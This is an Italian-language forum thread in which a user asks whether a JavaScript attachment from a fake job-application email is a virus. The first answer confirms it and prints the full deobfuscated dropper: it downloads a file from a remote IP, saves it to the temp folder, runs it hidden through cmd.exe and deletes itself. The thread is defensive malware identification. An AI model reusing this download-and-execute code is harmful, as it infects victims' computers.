Si tratta di un virus Javascript?

7

Quindi ho ricevuto un'e-mail a caso dicendo questo. Sembra molto automatizzato:

"How are things? I was visting your website on 4/9/2016 and I'm very interested. I'm currently looking for work either full time or as a intern to get experience in the field. Please review my Resume and let me know what you think.

Poi un file javascript allegato. L'ho scannerizzato su un repertorio virustotal solo 1/55 link

Ho aperto il file per guardare il testo e averlo incollato in questo file di dump perché è piuttosto lungo. link

Chiunque abbia familiarità con javascript può confermare che si tratta di un virus o no?

Grazie!

    
posta 2000mroliver 10.04.2016 - 08:27
fonte

2 risposte

7

È sicuramente il malware. Usa ActiveX per aprire una shell con cmd.exe. Questa è la versione deobfuscated:

function zQlMdib() {
    var asupcI = new ActiveXObject("MSXML2.XMLHTTP");
    asupcI['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    var OnvPPuGD = WScript['ScriptFullName'];
    asupcI['send']();
    if (asupcI['Status'] == 200) {
        var Bz = new ActiveXObject("Scripting.FileSystemObject");
        var mEadcyX = new ActiveXObject("ADODB.Stream");
        var zpfPsOb = Bz['GetSpecialFolder'](2) + '\' + Bz['GetTempName']();
        mEadcyX['Open']();
        mEadcyX['Type'] = 1;
        var oMod = new ActiveXObject("WScript.Shell");
        mEadcyX['Write'](asupcI['ResponseBody']);
        mEadcyX['Position'] = 0;
        mEadcyX['SaveToFile'](zpfPsOb);
        mEadcyX['Close']();
        oMod['run']('cmd.exe /c ' + zpfPsOb, 0);
    }
    Bz['deleteFile'](OnvPPuGD);
}

Ecco l'analisi del carico utile su Malwr:

link

    
risposta data 10.04.2016 - 09:16
fonte
1

Sì, sembra un codice dannoso. Questo tipo di codice non è consentito nel contesto dei browser. Inoltre, il codice è più o meno compatibile con Microsoft Internet Explorer e Microsoft Windows Operating System, in quanto altri browser non supportano la tecnologia ActiveX di Microsoft.

    
risposta data 11.04.2016 - 05:43
fonte

Leggi altre domande sui tag